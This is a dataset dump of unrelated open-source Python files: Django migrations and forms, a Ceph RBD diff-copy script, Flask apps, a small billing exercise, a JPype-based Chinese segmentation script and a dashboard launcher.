| 2021-03-27T08:56:32.850051
| 2013-02-05T04:48:32
| 2013-02-05T04:48:32
| 2,887,554
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,389
|
py
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting model 'ShippingLabel'
db.delete_table('cart_shippinglabel')
# Adding model 'Shipment'
db.create_table('cart_shipment', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('purchase', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['cart.Purchase'])),
('tracking_number', self.gf('django.db.models.fields.CharField')(max_length=250, null=True, blank=True)),
('delivery_date', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
('ship_date', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
('shipping_method', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['retailers.ShippingType'], null=True, blank=True)),
('label', self.gf('django.db.models.fields.files.ImageField')(max_length=100, null=True, blank=True)),
('status', self.gf('django.db.models.fields.CharField')(max_length=128)),
))
db.send_create_signal('cart', ['Shipment'])
# Deleting field 'Purchase.shipping_method'
db.delete_column('cart_purchase', 'shipping_method_id')
# Deleting field 'Purchase.shipping_number'
db.delete_column('cart_purchase', 'shipping_number')
# Deleting field 'Purchase.delivery_date'
db.delete_column('cart_purchase', 'delivery_date')
# Adding field 'Purchase.status'
db.add_column('cart_purchase', 'status',
self.gf('django.db.models.fields.CharField')(default='placed', max_length=32),
keep_default=False)
# Deleting field 'Item.shipping_method'
db.delete_column('cart_item', 'shipping_method_id')
# Deleting field 'Item.shipping_label'
db.delete_column('cart_item', 'shipping_label_id')
# Deleting field 'Item.shipping_number'
db.delete_column('cart_item', 'shipping_number')
def backwards(self, orm):
# Adding model 'ShippingLabel'
db.create_table('cart_shippinglabel', (
('image', self.gf('django.db.models.fields.files.ImageField')(max_length=100, null=True, blank=True)),
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('tracking_number', self.gf('django.db.models.fields.CharField')(max_length=250, null=True, blank=True)),
))
db.send_create_signal('cart', ['ShippingLabel'])
# Deleting model 'Shipment'
db.delete_table('cart_shipment')
# Adding field 'Purchase.shipping_method'
db.add_column('cart_purchase', 'shipping_method',
self.gf('django.db.models.fields.related.ForeignKey')(to=orm['retailers.ShippingType'], null=True, blank=True),
keep_default=False)
# Adding field 'Purchase.shipping_number'
db.add_column('cart_purchase', 'shipping_number',
self.gf('django.db.models.fields.CharField')(max_length=250, null=True, blank=True),
keep_default=False)
# Adding field 'Purchase.delivery_date'
db.add_column('cart_purchase', 'delivery_date',
self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True),
keep_default=False)
# Deleting field 'Purchase.status'
db.delete_column('cart_purchase', 'status')
# Adding field 'Item.shipping_method'
db.add_column('cart_item', 'shipping_method',
self.gf('django.db.models.fields.related.ForeignKey')(to=orm['retailers.ShippingType'], null=True, blank=True),
keep_default=False)
# Adding field 'Item.shipping_label'
db.add_column('cart_item', 'shipping_label',
self.gf('django.db.models.fields.related.ForeignKey')(to=orm['cart.ShippingLabel'], null=True, blank=True),
keep_default=False)
# Adding field 'Item.shipping_number'
db.add_column('cart_item', 'shipping_number',
self.gf('django.db.models.fields.CharField')(max_length=250, null=True, blank=True),
keep_default=False)
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
},
'cart.cart': {
'Meta': {'ordering': "('-creation_date',)", 'object_name': 'Cart'},
'checked_out': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {}),
'grand_total': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ref': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'}),
'shipping_and_handling_cost': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}),
'shipping_method': ('django.db.models.fields.related.ForeignKey', [], {'default': '4', 'to': "orm['retailers.ShippingType']", 'null': 'True', 'blank': 'True'})
},
'cart.checkout': {
'Meta': {'object_name': 'Checkout'},
'cart': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cart.Cart']"}),
'complete': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'purchaser': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'purchaser_checkout_set'", 'null': 'True', 'to': "orm['auth.User']"}),
'ref': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'}),
'retailer': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'retailer_checkout_set'", 'null': 'True', 'to': "orm['auth.User']"})
},
'cart.item': {
'Meta': {'ordering': "('cart',)", 'object_name': 'Item'},
'cart': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cart.Cart']"}),
'color': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'destination_zip_code': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'quantity': ('django.db.models.fields.PositiveIntegerField', [], {}),
'sales_tax_amount': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '18', 'decimal_places': '2', 'blank': 'True'}),
'shipping_amount': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '18', 'decimal_places': '2', 'blank': 'True'}),
'size': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'ordered'", 'max_length': '250'}),
'unit_price': ('django.db.models.fields.DecimalField', [], {'max_digits': '18', 'decimal_places': '2'})
},
'cart.purchase': {
'Meta': {'object_name': 'Purchase'},
'cart': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cart.Cart']"}),
'checkout': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cart.Checkout']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'item': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cart.Item']"}),
'purchased_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'purchaser': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'ref': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'placed'", 'max_length': '32'}),
'transaction': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['stunable_wepay.WePayTransaction']"})
},
'cart.shipment': {
'Meta': {'object_name': 'Shipment'},
'delivery_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'purchase': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cart.Purchase']"}),
'ship_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'shipping_method': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['retailers.ShippingType']", 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'tracking_number': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'retailers.shippingtype': {
'Meta': {'object_name': 'ShippingType'},
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'vendor': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'vendor_tag': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'stunable_wepay.wepaytransaction': {
'Meta': {'object_name': 'WePayTransaction'},
'checkout_id': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'date_modified': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
}
}
complete_apps = ['cart']
|
[
"gdamon@gmail.com"
] |
gdamon@gmail.com
|
e3304c28ddec47e47e05ea577296a4fbb00aed1a
|
53e37c177f580e11bd856b8f0291a3abb8d77450
|
/core/forms.py
|
0329f14dee625c89b51c9682c474684a0ffbe54b
|
[] |
no_license
|
cefer96/test-project
|
74426b510c4a415256a9b932fee9b619065540e1
|
6ec89d0b5cb4ef1dbbb79de605b1325281366acb
|
refs/heads/master
| 2020-11-25T12:19:59.424802
| 2019-12-19T16:38:32
| 2019-12-19T16:38:32
| 228,656,177
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 288
|
py
|
from django import forms
from core.models import MailTest
class MailForms(forms.ModelForm):
email = forms.CharField(label='Email', widget=forms.EmailInput(attrs={'placeholder': "Email",'class': 'form-control'}))
class Meta:
model = MailTest
fields = '__all__'
|
[
"jafar.h@labrin.tech"
] |
jafar.h@labrin.tech
|
745339c36ac28bb2eaffbf6808ab4d627b34c918
|
09a9748b6a107af9d4b1f1cbd6aa6fa5fa94c36a
|
/imageUpload/migrations/0005_cosmetics.py
|
03bd628da7ae5572911d3506560a09dd4c99bf84
|
[] |
no_license
|
choijy1994/showmethecolor
|
986a4619ffc3bf7e2e116e50813536066d840a30
|
eaebab1e9c94b23e76175680e8b82b970897a399
|
refs/heads/master
| 2022-12-11T01:37:49.855657
| 2019-06-08T06:54:06
| 2019-06-08T06:54:06
| 190,741,417
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 662
|
py
|
# Generated by Django 2.1.7 on 2019-05-08 06:20
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('imageUpload', '0004_auto_20190508_1512'),
]
operations = [
migrations.CreateModel(
name='Cosmetics',
fields=[
('name', models.CharField(default='', max_length=50, primary_key=True, serialize=False)),
('brand', models.CharField(default='', max_length=50)),
('R', models.IntegerField()),
('G', models.IntegerField()),
('B', models.IntegerField()),
],
),
]
|
[
"shvk54@gmail.com"
] |
shvk54@gmail.com
|
1cc827a04aae95a9a2e9660b399b01a893ba1ac2
|
94cf6abf87852d513fec6e41dbf69f15d835487e
|
/learn-rbd.py
|
af24d053dd155f59d1bdfdaa6a5c440b5f3b8efb
|
[] |
no_license
|
binhnq94/learn_ceph
|
0f7eed16668469a93c698811b307622f201ec6cd
|
6e5421987a33f835ad04d92dbeb88e9b2d526f67
|
refs/heads/master
| 2021-07-29T08:39:55.432536
| 2016-07-01T10:26:38
| 2016-07-01T10:26:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,486
|
py
|
import rbd
import rados
import os
try:
cluster = rados.Rados(conffile=os.path.abspath('ceph.conf'))
except TypeError as e:
print 'Argument validation error: ', e
raise e
# print "Created cluster handle."
try:
cluster.connect()
except Exception as e:
print "connection error: ", e
raise e
# finally:
# print "Connected to the cluster."
if not cluster.pool_exists('pool1'):
# print "create data pool"
# cluster.create_pool('data')
raise RuntimeError('No data pool exists')
ioctx = cluster.open_ioctx('pool1')
diffs = []
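# Callback passed to Image.diff_iterate(): it is invoked once per extent that
# changed since the 'snap1' snapshot and simply records (offset, length, exists).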
def interate_cd(offset, length, exists):
# print "-------------------------"
# print "offset: ", offset
# print "length: ", length
# print "exists: ", exists
diffs.append({'offset': offset, 'length':length, 'exists': exists})
with rbd.Image(ioctx, 'binh') as image:
with rbd.Image(ioctx, 'binh_dr') as image1:
# print image.size()
# print image1.size()
snaps = image.list_snaps()
# for snap in snaps:
# print snap
# print image.size()
image.diff_iterate(0, image.size(), 'snap1', interate_cd)
# print diffs
with open('test-diff', 'w') as file:
for diff in diffs:
# print type(image.read(diff['offset'], diff['length']))
image1.write(image.read(diff['offset'], diff['length']), diff['offset'])
image.close()
image1.close()
ioctx.close()
cluster.shutdown()
|
[
"quangbinh.nguyentrong@gmail.com"
] |
quangbinh.nguyentrong@gmail.com
|
be49c80a19b24f3461b98a97239a5ee906b066c3
|
952eaaff06d57b02cddbfa3ea244bbdca2f0e106
|
/src/Utils/Python/Tests/test_ElementData.py
|
542e6c8ce12be289f13e273807a06658fdaf9566
|
[
"BSD-3-Clause"
] |
permissive
|
DockBio/utilities
|
413cbde988d75a975b3e357c700caa87406c963b
|
213ed5ac2a64886b16d0fee1fcecb34d36eea9e9
|
refs/heads/master
| 2023-02-25T20:50:19.211145
| 2020-04-27T20:41:03
| 2020-04-27T20:41:03
| 257,099,174
| 0
| 0
|
BSD-3-Clause
| 2020-04-27T20:41:05
| 2020-04-19T20:48:18
| null |
UTF-8
|
Python
| false
| false
| 313
|
py
|
import pytest
import scine_utilities as scine
def test_ElementData():
a = scine.ElementDataSingleton.instance()
# Access via element type and symbol string
element_data_h = a[scine.ElementType.H]
element_data_f = a["F"]
assert element_data_h.symbol == "H"
assert element_data_f.Z == 9
|
[
"scine@phys.chem.ethz.ch"
] |
scine@phys.chem.ethz.ch
|
86edd47ed717d86ca698b95755233877fc986709
|
16592bba87fdc74aed04f9fe9256d413e5867d3d
|
/app.py
|
272a1e6cf3efe633cfc843674ddee727ba50796a
|
[] |
no_license
|
chenjf2015103095/FaceNet
|
7a79abf7d832265f622c0d8a47e45f5f2442ec5c
|
bb97c4dfe53358de458639170ad0b09a7d1cc0ae
|
refs/heads/master
| 2023-03-30T07:31:01.084393
| 2021-05-21T07:40:29
| 2021-05-21T07:40:29
| 191,882,724
| 0
| 0
| null | 2023-03-25T00:06:52
| 2019-06-14T05:46:02
|
Python
|
UTF-8
|
Python
| false
| false
| 3,475
|
py
|
# -*- coding:utf-8 -*-
from flask import Flask, g
from flask import request, Response,render_template
from werkzeug.contrib.fixers import ProxyFix
import config
from zhousf_lib.util import log, string_util
from info import response_info as res
import time
import random
from flask_sqlalchemy import SQLAlchemy
def config_app(flask_app):
flask_app.jinja_env.auto_reload = True
flask_app.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024
flask_app.secret_key = config.CONFIG_SERVER.secret_key
flask_app.config['JSON_AS_ASCII'] = False
flask_app.wsgi_app = ProxyFix(app.wsgi_app)
flask_app.config['SQLALCHEMY_DATABASE_URI'] = config.CONFIG_SERVER.database_url
flask_app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = 'True'
@flask_app.before_request
def before_request():
request_id = str(time.time()) + '_' + str(random.randint(10000, 99999))
real_ip = request.headers.get('X-Real-Ip', request.remote_addr)
g.request_id = request_id
g.real_ip = real_ip
g.request_path = str(request.path)
msg = 'request =[request_id:%s, ip:%s, url:%s, method:%s]' \
% (request_id, real_ip, g.request_path, str(request.method))
log.API.info(msg)
# abort(400)
@flask_app.after_request
def after_request(environ):
# if isinstance(environ, Response):
# if string_util.not_contain(environ.data, '<html>'):
# log.API.info(
# 'response=[request_id:%s, ip:%s, %s]' % (g.request_id, g.real_ip, environ.data))
return environ
@flask_app.errorhandler(405)
def method_illegal(e):
return res.package(405, 'Method Not Allowed.')
@flask_app.errorhandler(404)
def url_not_found(e):
return res.package(404, 'Not Found: ' + g.request_path)
    @flask_app.errorhandler(400)
    def bad_request(e):
        return res.package(400, 'The request was refused.')
@flask_app.errorhandler(Exception)
def exception_error(e):
return res.package(500, 'Exception:%s' % str(e.message))
@flask_app.errorhandler(500)
def internal_server_error(e):
return res.package(500, 'Server internal error.')
def register_blueprint(flask_app):
from business.model_user import userModel
flask_app.register_blueprint(userModel, url_prefix='/user')
app = Flask(__name__)
@app.route('/')
def hello():
real_ip = request.headers.get('X-Real-Ip', request.remote_addr)
return 'Hello %s' % real_ip
# @app.route('/user/sign_in/')
# def sign_in():
# return render_template('sign_in.html')
# @app.route('user/sign_up/')
# def sign_up():
# return render_template('sign_up.html')
config_app(app)
db = SQLAlchemy(app)
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(50), unique=True)
age = db.Column(db.Integer)
sex = db.Column(db.String(10))
department = db.Column(db.String(100))
identifyId = db.Column(db.String(100))
faceId = db.Column(db.Text)
if __name__ == "__main__":
    register_blueprint(app)
    # create the tables before app.run(), which blocks until the server stops
    db.create_all()
if config.CONFIG_SERVER.use_ssl:
ssl_context = (config.CONFIG_SERVER.ssl_crt, config.CONFIG_SERVER.ssl_key)
else:
ssl_context = None
app.run(host=config.CONFIG_SERVER.host,
port=config.CONFIG_SERVER.port,
debug=config.CONFIG_SERVER.debug,
ssl_context=ssl_context,
threaded=True)
|
[
"1309304223@qq.com"
] |
1309304223@qq.com
|
ae7a581398c97e0116c2064320984c14329749df
|
a3a5f5c1e0b24f9017d11e87c0f4ea5121831ff0
|
/Workspace/blogproject/blog/views.py
|
d09b4ff70fdbe1060173faa5f8032faf9b0e59dd
|
[] |
no_license
|
HANCAO/hschen.top
|
32478befd5d816b7b703395dbbc21f5587a0e3bd
|
3b2bbac306900fa75ec73c41fa3cb01ed3de6e52
|
refs/heads/master
| 2021-05-08T00:26:29.055050
| 2019-02-17T03:23:36
| 2019-02-17T03:23:36
| 107,679,469
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,611
|
py
|
import markdown
from django.shortcuts import render,get_object_or_404
from .models import Post,Category
from comments.forms import CommentForm
# Create your views here.
def index(request):
post_list=Post.objects.all().order_by('-created_time')
return render(request,'blog/index.html',context={'post_list':post_list})
#return render(request,'blog/index.html',context={
    # 'title':'My blog home page',
    # 'welcome':'Welcome to my blog home page'
# })
def archives(request,year,month):
post_list=Post.objects.filter(created_time__year=year,
created_time__month=month,
).order_by('-created_time')
return render(request,'blog/index.html',context={'post_list':post_list})
def category(request,pk):
cate=get_object_or_404(Category,pk=pk)
post_list=Post.objects.filter(category=cate).order_by('-created_time')
return render(request,'blog/index.html',context={'post_list':post_list})
def detail(request,pk):
post=get_object_or_404(Post,pk=pk)
post.body=markdown.markdown(post.body,
extensions=[
'markdown.extensions.extra',
'markdown.extensions.codehilite',
'markdown.extensions.toc',
])
form = CommentForm()
comment_list=post.comment_set.all()
context={
'post':post,
'form':form,
'comment_list':comment_list
}
return render(request,'blog/detail.html',context=context)
|
[
"noreply@github.com"
] |
HANCAO.noreply@github.com
|
5e60082b7b3c49ea6324f08d8a9ad2d6552f8f82
|
223caa5d05db031589dd754fcd697388273bd617
|
/Supermarket.py
|
8a3e68c5b0a10796c31476f602d1d18bb4b18235
|
[] |
no_license
|
LuanComputacao/python
|
72d34999e7098c0fba145072639128a753ee42d7
|
768d1600cfe7a8c0f0759683801ab2d4b3648aa4
|
refs/heads/master
| 2021-01-10T21:04:13.776670
| 2015-05-17T13:09:42
| 2015-05-17T13:09:42
| 34,735,096
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 582
|
py
|
shopping_list = ["apple", "pear", "banana"]
stock = {
"banana": 6,
"apple": 0,
"orange": 32,
"pear": 15
}
prices = {
"banana": 4,
"apple": 2,
"orange": 1.5,
"pear": 3
}
# Write your code below!
def compute_bill(food):
total = 0
for key in food:
print(key)
if stock[key] > 0:
total += prices[key]
stock[key] -= 1
print("price: %s" % prices[key])
else:
print("no item")
print("price: 0")
        print()
return total
print(compute_bill(shopping_list))
|
[
"luanengcomputacao@gmail.com"
] |
luanengcomputacao@gmail.com
|
6e2f2852dd8aac0e24dcbb59aaa9048e71c63bc6
|
3c59fb0705a561d5b32c91a8b323789837b6881b
|
/code/sth.py
|
892c9011dcf90ce21389c316081592d43c31e351
|
[] |
no_license
|
sarahlia/python-gen-exercises
|
13e15e20dc37d1630b42c200f2d1f8b05de81ca9
|
2b42eccb36f1a66c41689ea304bbc2b6ec498397
|
refs/heads/master
| 2023-08-15T04:33:45.646777
| 2021-10-22T20:33:17
| 2021-10-22T20:33:17
| 404,006,106
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 351
|
py
|
import os
from flask import Flask
def create_app(test_config=None):
app = Flask(__name__)
app.config.from_mapping(
SECRET_KEY=os.environ.get('SECRET_KEY', default='dev'),
)
if test_config is None:
app.config.from_pyfile('config.py', silent=True)
else:
app.config.from_mapping(test_config)
return app
|
[
"sarahlia23@outlook.com"
] |
sarahlia23@outlook.com
|
a6699e68f3554bf2e09f6facda57d2bce37c27ef
|
321b5e0646c9f26100d86c098da3ce52552088ac
|
/src/main/urls.py
|
0d2008087a32de5de963810a571ff387d12f1e36
|
[] |
no_license
|
Yobmod/dmlDjangoReact
|
9dc500f5242af86273d0001c699dc568b8579b50
|
74e295e0d8a0d521eb6131b20a4debd3e830a609
|
refs/heads/master
| 2022-04-03T10:31:42.329994
| 2017-08-14T15:53:07
| 2017-08-14T15:53:07
| 100,283,713
| 0
| 0
| null | 2020-02-15T15:06:44
| 2017-08-14T15:42:44
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 462
|
py
|
from django.conf.urls import url
from . import views
app_name = 'main'
urlpatterns = [
url(r'^$', views.homepage, name='homepage'),
url(r'^facilities/$', views.facilities, name='facilities'),
url(r'^projects/$', views.facilities, name='projects'),
url(r'^publications/$', views.publications, name='publications'),
url(r'^contact/$', views.contact, name='contact'),
#url(r'^admin/$', views.django_admin_page, name='django_admin_page'), #link to admin
]
|
[
"yobmod@gmail.com"
] |
yobmod@gmail.com
|
dc00e98dac1a9a7c2aa7b66c7b1a357d99fd40c1
|
57b3ec21cc55885467f130519e7e0e0d2b60cd7d
|
/VAE_cn/hlSeg/demo/pyHlSegDemo.py
|
e9d7310f12d8c2c162a24769e1648486ab15f8ef
|
[
"MIT"
] |
permissive
|
xihuateng/VAE_sentence_generation
|
bb4321235ca2c4bb79b2b000201b4657bd4bd7fb
|
45af709b7caf09fdb30e7291f19384d73be386d0
|
refs/heads/master
| 2022-01-04T22:20:51.879861
| 2019-05-02T07:12:29
| 2019-05-02T07:12:29
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,887
|
py
|
#! /usr/bin/python2
# -*-coding: UTF-8 -*-
'''Traditional Chinese characters are not recognized'''
import jpype
import os.path
import sys,time
import os
reload(sys)
sys.setdefaultencoding( "utf-8" )
if __name__ == "__main__":
    # start the JVM
jar_path = os.path.abspath(u'/home/ywj/VAE_sentence_generation/VAE_cn/hlSeg/lib/')
hlSegJarPath = os.path.join(jar_path, u"hlSegment-5.2.15.jar")
    # note: only OpenJDK 8 works here; newer JVMs no longer support -Djava.ext.dirs, which triggers a cascade of bugs
jvmPath = u'/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/amd64/server/libjvm.so'
jpype.startJVM(jvmPath, "-ea", "-Djava.class.path=%s" % hlSegJarPath, "-Djava.ext.dirs=%s" % jar_path)
    # obtain the class definitions
BasicSegmentor = jpype.JClass('com.hylanda.segmentor.BasicSegmentor')
SegOption = jpype.JClass('com.hylanda.segmentor.common.SegOption')
SegGrain = jpype.JClass('com.hylanda.segmentor.common.SegGrain')
SegResult = jpype.JClass('com.hylanda.segmentor.common.SegResult')
    # create the segmenter object
segmentor = BasicSegmentor()
    # load the dictionary; if there is no user-defined dictionary, it can be loaded with the statement below (custom dictionaries need the correct file encoding)
#if not segmentor.loadDictionary("./hlsegsource/dictionary/CoreDict.dat", "../dictionary/userDict_utf8.txt"):
if not segmentor.loadDictionary("/home/ywj/VAE_sentence_generation/VAE_cn/hlSeg/dictionary/CoreDict.dat", None):
print "字典加载失败!"
exit()
    # create a SegOption object; to use the default segmentation options you can also pass None
option = SegOption()
option.mergeNumeralAndQuantity = False
    # the statement below can be used to adjust the segmentation granularity
#option.grainSize = SegGrain.LARGE
    # segmentation
path_in=u'/home/ywj/VAE_sentence_generation/VAE_cn/hlSeg/data/'
file_in=u'untrain.txt'
#file_in=u'as_test_jt.utf8'
#file_in=u'cityu_test_jt.utf8'
#file_in=u'msr_test.utf8'
#file_in=u'pku_test.utf8'
fr = open(path_in+file_in)
path_out=u'/home/ywj/VAE_sentence_generation/VAE_cn/hlSeg/data/'
file_out=u'untrainseg.txt'
#file_out=u'as_result.utf8'
#file_out=u'cityu_result.utf8'
#file_out=u'msr_result.utf8'
#file_out=u'pku_result.utf8'
fw = open(path_out+file_out,'a+')
    # iterate over the segmentation result and write the words out
for line in fr.readlines():
segResult = segmentor.segment(line, option)
word = segResult.getFirst()
while(word != None):
fw.write(word.wordStr)
fw.write(' ')
word = word.next
fr.close()
fw.close()
jpype.shutdownJVM()
exit()
'''
    # segmentation
segResult = segmentor.segment(u"欢迎使用由天津海量信息技术股份有限公司出品的海量中文分词系统", option)
    # iterate over and print the segmentation result
word = segResult.getFirst()
print "\nWords: ",
while(word != None):
print word.wordStr,
word = word.next
    # get the keywords
keywords = segResult.getKeywordsList()
print "\nkeywords: ",
for kw in keywords: print "%s:%.1f" % (kw.wordStr, kw.weight),
print ""
jpype.shutdownJVM()
exit()
'''
|
[
"mryuan0428@126.com"
] |
mryuan0428@126.com
|
9f3b3d6985ccaeae9c7b73e2963e76eb98dd2e1d
|
73ceefbaac7900eca5ac84fbb3dc695bbef95a81
|
/py/rackattack/dashboard/main.py
|
1517f8998731826ac4a999c7e8e741a812e58be4
|
[
"Apache-2.0"
] |
permissive
|
shlomimatichin/rackattack-physical-dashboard
|
18d917db1c12cbbae2f7fbedf8773adf74f8fba5
|
a814060f3602b27e3e2e8e7ac0161966e9db6f88
|
refs/heads/master
| 2020-12-11T05:26:15.507928
| 2015-04-15T09:16:58
| 2015-04-15T09:16:58
| 28,646,899
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,548
|
py
|
import logging
import argparse
import realtimewebui.config
import os
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
parser = argparse.ArgumentParser()
parser.add_argument("--webPort", type=int, default=6001)
parser.add_argument("--webSocketPort", type=int, default=6002)
parser.add_argument("--realtimewebuiRoot")
parser.add_argument("--dashboardRoot")
parser.add_argument("--localhostRackattackProvider", action='store_true')
args = parser.parse_args()
if args.realtimewebuiRoot is not None:
realtimewebui.config.REALTIMEWEBUI_ROOT_DIRECTORY = args.realtimewebuiRoot
if args.localhostRackattackProvider:
os.environ['RACKATTACK_PROVIDER'] = \
'tcp://localhost:1014@@amqp://guest:guest@localhost:1013/%2F@@http://localhost:1016'
from realtimewebui import server
from realtimewebui import rootresource
from realtimewebui import render
from rackattack.dashboard import pollthread
from twisted.web import static
poller = pollthread.PollThread()
render.addTemplateDir(os.path.join(args.dashboardRoot, 'html'))
render.DEFAULTS['title'] = "Rackattack"
